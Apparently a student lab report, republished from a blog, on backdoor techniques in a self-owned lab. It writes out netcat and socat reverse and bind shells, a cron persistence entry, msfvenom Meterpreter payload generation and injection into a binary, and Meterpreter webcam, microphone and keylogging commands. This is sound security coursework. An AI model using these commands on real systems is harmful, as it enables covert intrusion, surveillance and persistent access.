20232412 2025-2026-1 《网络与系统攻防技术》实验二实验报告

news/2025/10/22 22:57:28/文章来源:https://www.cnblogs.com/20232412nanarmy/p/19158883

1.实验内容

实践目标

  • 1.使用netcat 获取主机操作Shell,cron启动某项任务

  • 2.使用socat 获取主机操作Shell, 任务计划启动

  • 3.使用MSF meterpreter 生成可执行文件(后门),利用ncat传送到主机并运行获取主机Shell

  • 4.使用MSF meterpreter 生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权

  • 5.使用MSF 生成shellcode,注入到实践1中的pwn1 中,获取反弹连接Shell。

整个实验系统性地展示了后门技术的应用,从基础Shell获取,到高级信息收集和权限提升,形成完整攻击链,体现了渗透测试中多种技术手段的综合运用。

本次实验的重要知识点:

  • 后门:是攻击者在渗透目标系统后故意留下的隐蔽通道,用于绕过正常的安全认证机制,维持对系统的持久访问权限。

  • netcat、socat 和 MSF Meterpreter的使用:它们的本质都是为攻击者提供一条不受约束的“秘密路径”,用于执行命令、传输数据并维持对受害主机的持久访问权限。

问题回答

  • 例举你能想到的一个后门进入到你系统中的可能方式?

通过软件供应链攻击实现,攻击者可能劫持或仿冒合法软件的下载渠道,将后门程序捆绑在正常安装包中。当用户在未经验证的第三方平台下载并运行该软件时,安装程序会在执行常规功能的同时,于后台静默部署后门载荷。后门自启动后会实现持久化驻留,继而建立与远程命令控制服务器的加密连接。

  • 例举你知道的后门如何启动起来(win及linux)的方式?

1.创建计划任务,可以设置为用户登录时、系统启动时或特定时间间隔触发

2.将后门程序的快捷方式放入当前用户的启动文件夹

3.某项服务程序存在漏洞,被攻击者注入了shellcode,该程序运行时便可能触发运行后门

  • Meterpreter有哪些给你映像深刻的功能?

Meterpreter的强大之处在于它超越了简单的远程Shell,它能够实现远程截图、摄像头监控、获取键盘记录,收集的信息相当全面。

  • 如何发现自己有系统有没有被安装后门?

重点监控异常的网络连接、可疑的自启动项及陌生进程,并使用安全工具检查系统关键位置是否存在未经授权的修改,同时分析系统日志中的非正常登录与操作记录。

2.实验过程

2.1 使用netcat获取主机操作Shell,cron启动定时任务

为保障实验的顺利进行,我们首先要进行环境配置。关闭Windows 主机的防火墙,将杀毒软件暂时关闭,并关闭Windows 主机自带的防病毒软件

66d55cd4a1db0feb376ab6d1a82f541c

39785a7c069291826e2fe92d5a6a67b0

从课程主页附件中下载ncat.rar,并解压使用。在ncat 所在的文件夹打开Windows 终端,输入./ncat.exe -l -p 2412打开监听,指定监听2412窗口。

d5239d55cfa6935bc67fd9767c349fd3

我们可以输入指令netstat -an |findstr "2412",检查系统中是否有程序正在使用2412 端口。这里显示LISTENING,表示正在监听。

a4b940a20353b49729f1e2bba93f5dd9

我们在虚拟机中输入命令nc 192.168.1.113 2412 -e /bin/sh(192.168.1.113为主机IP),与主机的2412 端口发起一个TCP 连接,将自己的Shell 控制权交给了主机。

我们在主机上输入Linux的命令,可以发现能执行虚拟机的Shell,则代表连接成功。

a548796fac0ea2d2cb5d53d6e3f5bd3e

同理,我们也可以将主机的Shell 控制权交给虚拟机,虚拟机监听2412 窗口,主机主动向192.168.109.132 的2412 端口发起TCP 连接(192.168.109.132 为虚拟机IP),虚拟机获得一个到您机器上 cmd.exe 的远程控制通道。
我们在主机上输入Windows 的命令,可以发现能执行主机的Shell,则代表连接成功。
a68b3ee90478fd5a1c9628536c5f1fae

f748d182066575ed7ec55cf85067a3b4

cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程。在虚拟机中,我们输入crontab -e来编辑crontab 文件。

我们在文件中加入内容12 ****/bin/netcat 192.168.1.113 2412 -e /bin/sh,创建cron 计划任务条目,用于设置持久化的后门,代表每小时的12 分钟时执行一次,将自动把本机的Shell控制权连接到主机192.168.1.113 上。输入crontab -l,列出当前用户的cron 计划任务,验证添加成功。

bd427195fac9d748fa2799c5925ac270

当系统时间到12分时,我们可以在主机上获得了Linux Shell,代表连接成功。

5af3b6d1bac905afc321fa613f520ee6

2.2 使用socat获取主机操作Shell, 任务计划启动

从课程主页附件中下载socat.rar,并解压使用。在主机上打开任务计划程序,创建自启动任务,设置socat 工作站锁定时启动,并添加参数tcp-listen:2412 exec:cmd.exe,pty,stderr,在 2412 端口启动一个TCP 监听服务,当有客户端连接时,执行cmd.exe。

29967f3e46a0622f4e1a9aa3eb10013f

1c042dc1da914b5c6948018b9a611075

当我们手动锁定工作站,解锁后会弹出窗口,代表socat 已运行,我们在虚拟机上输入socat - tcp:192.168.1.113:2412连接到主机的后门,这时就能执行主机的Shell。

1f887503029d839aeda50831ef839f95

b5f8698a4e7bb915d9071eb3962141ae

2.3 使用MSF meterpreter生成可执行文件(后门),利用ncat传送到主机并运行获取主机Shell

在虚拟机上输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.109.132 LPORT=2412 -f exe > meter_backdoor.exe,生成一个Windows 平台的Meterpreter 反向 TCP 后门程序。

acb15d2b2f2893f894aa6f13d43969bf

生成完毕后将可执行文件,在主机上输入ncat.exe -lvnp 2412 > meter_backdoor.exe,在2412 端口等待传入连接文件。

4ce5723c369256f076753401bcc710ad

在虚拟机上的终端上输入nc 192.168.109.1 2412 <meter_backdoor.exe,向Windows 机器发送后门文件。

39c67f8f4f1e39e6e9db2531e5020cd1

7df73c98dff8b975940815fbfd10b579

在虚拟机的终端输入指令msfconsole,打开主要控制台界面,对监听模块进行配置。

各配置的含义:

  • use exploit/multi/handler:选择接收反向连接的后门载荷

  • set payload windows/meterpreter/reverse_tcp:设置了Windows 的Meterpreter 反向TCP 载荷

  • set LHOST 192.168.109.132set LPORT 2412:设置监听IP 和端口

  • exploit:启动监听器

183cd9e3d8ef8857d1eddc3c5787d6b8

在主机上运行给个传来的后门程序,我们发现虚拟机连接上主机,输入dir 后获得当前目录下的文件与目录

87f28ea6cc04b84ba471d02d11c40643

2.4 使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权

在第三步连接上主机后,我们输入record_micwebcam_snapkeyscan_start & keyscan_dump,分别能获取目标主机音频、摄像头、击键记录等内容

646f843bc97c5f3035c866e733eb21bf

8b5048c21387eeeced6cd3849bfde49e

我们尝试提权,输入getuid命令可查看初始用户名,再输入getsystem发现用户依然不变,这是因为当前会话权限不足,与同学交流后知道如果Windows是以管理员身份运行的后门文件,就能提权成功。

9f42847812db625b741ed63dd5cd1089

2.5 使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

在虚拟机终端中输入msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.109.132 LPORT=4444 -x pwn1 -f elf > pwn1_2,读取原有的pwn1 程序,将Meterpreter shellcode 注入到pwn1 中,创建一个嵌入了 Meterpreter 后门的 Linux 可执行文件。

2ae91dd291dd92c024b06dc6c9787eb5

在虚拟机的终端输入指令msfconsole,打开主要控制台界面,对监听模块进行配置。输入chmod +x pwn1_2给后门文件执行权限,随后开始运行。当我们运行pwn1_2时,成功获取shell。

6c730f11e860f3d5ae7a1a6135535df3

3.问题及解决方案

  • 问题1:getsystem提权失败
  • 问题1解决方案:windows用户本身权限不够,以管理员身份运行后门文件就能成功。查询资料知道也可以使用UAC 绕过模块,实现提权。
  • 问题2:ncat传输后门文件至主机后无法运行

f5acf8aab85c1df0f1cd7132be0bba6d

  • 问题2解决方案:查询资料后知道ncat 默认使用文本模式传输数据,在文本模式下,某些字符会被自动转换,可能进行字符编码转换。所以展示的是文件传输过程,实际的执行文件则是用剪贴板复制到主机上。

4.学习感悟、思考等

通过本次实验,我对后门技术有了更为深刻的理解,后门本质上是一种隐蔽的权限维持机制,其突破正常认证体系,建立持久化的控制通道。在实践过程中,我认识到后门技术的强大功能,不仅能获取Shell,利用MSF meterpreter甚至还能进行音视频监控、击键记录等高阶操作。将恶意代码嵌入正常程序pwn1中,能实现合法程序掩护非法功能,这种白加黑体现了后门的隐蔽性。这些特性提示我们,网络安全防护必须从多个层面构建防御体系:既要监控异常网络连接和自启动项,又要加强软件来源验证和系统完整性检查。

参考资料

后门原理与实践

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/943817.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

20232403 2025-2026-1 《网络与系统攻防技术》实验二实验报告

20232403 2025-2026-1 《网络与系统攻防技术》实验二实验报告 1.实验内容 1.1netcat和cron协同进行后门入侵的意义 netcat在目标主机上监听端口等待连接,并创建网络连接,提供远程shell访问,但是这种连接是单次的、临…

分治算法举例与心得

找第k小数的分治算法: 选基准,将数组划分为小于等于基准和大于基准的两部分,基准位置为m 若m=k,返回基准 若m>k,在左部分递归找第k小数 若m<k,在右部分递归找第k-m小数 时间复杂度: 最好情况:每次划分均…

第2天(简单题中等题 取余、因数与倍数、数组 矩阵、数组 字符串)

打卡第二天 9道简单题+1道中等题2的幂的二进制是100000... 利用此特殊性可以把2的幂和二进制联系起来原矩阵:m行 n列 → 转置矩阵:n行 m列; 原矩阵的[i][j] → 转置矩阵的[j][i]二分查找问题 题目:解答:今日耗时≈…

2025.10.22总结

之前在软件案例分析上机课上,因为小组作业需要开发cs架构的一个大项目,因为对编程语言c#,编译器visual studio,编译环境不熟悉.net,先让ai跑了一个cs示例程序,一个服务器端一个客户端,学生的增删改查没加数据库。…

# 20232429 马成栋 2025-2026-1 《网络与系统攻防技术》实验二实验报告

1.实验内容 掌握后门原理及免杀技术 回答问题 (1)例举你能想到的一个后门进入到你系统中的可能方式? 通过一些恶意链接,在用户点击进去之后就给系统自动安装后门 (2)例举你知道的后门如何启动起来(win及linux)的方式…

20232325 2025-2026-1《网络与系统攻防技术》实验二实验报告

后门原理与实践 1. 实验内容学习netcat、socat工具的使用 学习使用MSF meterpreter生成后门文件,并通过netcat或者socat将后门文件远程传输至目标主机 学习如何利用MSF meterpreter生成的后门文件窃取目标主机摄像头内…

20232415 2025-2026-1 《网络与系统攻防技术》 实验二实验报告

一、实验目的 (1)使用netcat获取主机操作Shell,通过cron启动某项任务 (2)使用socat获取主机操作Shell, 通过任务计划启动 (3)使用MSF meterpreter生成后门程序,利用ncat或socat传送到主机并运行获取主机Shell (4)使用…

结对项目:四则运算生成器

双人合作项目 - 四则运算生成器 一、项目信息项目名称 双人合作项目-四则运算生成器课程所属班级 计科2班* 作业要求 作业要求链接作业目标 熟悉体会双人合作构建项目的流程,深入理解项目实现过程中的分工与交流的重要…

CSP-S2023

T4 CSP-S 2023 种树 显然答案有单调性,考虑二分答案 \(t\)。 二分有什么好处呢?就是可以知道每棵树最坏在哪天种才能达到 \(a_i\) 的高度。(不二分是做不到的,因为 \(x\) 是从 \(1\) 开始计数的。) 而这个部分显然…

Spring Boot 中全面解决跨域请求

什么是跨域请求(CORS) 跨域的概念 跨域是指浏览器出于安全考虑,限制了从不同源(协议,域名,端口任一不同)的服务器请求资源,这是浏览器的同源策略(Same-Origin Policy)所导致的。同源策略要求一下三个必须相同…

OpenTelemetry语义约定:规范可观测性数据,提升系统洞察力

在现代分布式系统中,可观测性(Observability)已成为保障系统健康和快速定位问题的关键。然而,随着微服务数量的增长和各种可观测性工具的涌现,如何统一和规范化指标(Metrics)、日志(Logs)和链路追踪(Traces)…

Serilog基于Seq开源框架实现日志分析

一、NuGet 包管理器中下载相关包SerilogSerilog.Sinks.Console(控制台输出)Serilog.Sinks.File(输出到文件)Serilog.Sinks.Seq(输出到Seq服务)二、搭建 Seq 日志服务 Docker命令行快速启动点击查看代码 // 启动项…

US$390 TabScan T6XENTRY C6 Diagnostic Tool Support DoIP J2534 PDU Passthru CANFD

**Revolutionizing Mercedes-Benz Diagnostics: The TabScan T6XENTRY C6 Diagnostic Tool** In the rapidly evolving world of automotive diagnostics, having the right tool can make the difference between a q…

10.20-10.26

10.20 gugugu 10.21 gugugu... 10.22 abc290f 发现实际可能对答案造成贡献的序列的和为\(2n-2\),于是我们通过插板法计算答案: \[\sum_{k=1}^n\dbinom{n}{k}\dbinom{n-3}{k-2}(n-k+1) \]然后化简,通过吸收恒等式和范…

20232421 2025-2026-1 《网络与系统攻防技术》实验二实验报告

1.实践内容 1.1 实践目标使用netcat获取主机操作Shell,cron启动某项任务(任务自定) 使用socat获取主机操作Shell, 任务计划启动 使用MSF meterpreter(或其他软件)生成可执行文件(后门),利用ncat或socat传送到主…

两两交换链表中的节点-leetcode

题目描述 给你一个链表,两两交换其中相邻的节点,并返回交换后链表的头节点。你必须在不修改节点内部的值的情况下完成本题(即,只能进行节点交换)。 示例 1:输入:head = [1,2,3,4] 输出:[2,1,4,3]示例 2: 输入…

算法第二章实践作业

1.随机选择数组中的一个元素作为基准值,将数组划分为三部分:小于基准值的元素(左子数组)、等于基准值的元素(中间部分)、大于基准值的元素(右子数组)。若左子数组的长度 ≥ k,则第 k小的元素一定在左子数组中…

解决homebrew下载报错问题

报错: Error: mysql-client@8.4: Failed to download resource "openssl@3.rb"Download failed: https://raw.githubusercontent.com/Homebrew/homebrew-core/5780e7787be0ee2813710acd974cd41d6b260860/Fo…

软考中级学习总结(5)

连接: (1)Theata连接:R 连接 S theata表示任意不等符 (2)等值连接:R连接S,要求属性相同 (3)自然连接:R连接S,要求R与S有一个/多个同名的属性 计算出RXS,选出其中R.A=S.A 的行 外连接: 1.左外连接(保左)…

软考中级学习总结(4)

知识产权 专利地域性:只在申请国领域内受保护 计算机软件著作权的主体:人 依据:《中华人民共和国著作权法》,《计算机软件保护条例》 计算机软件著作权客体:计算机程序以及有关文档 程序设计说明书 流程图 用户手…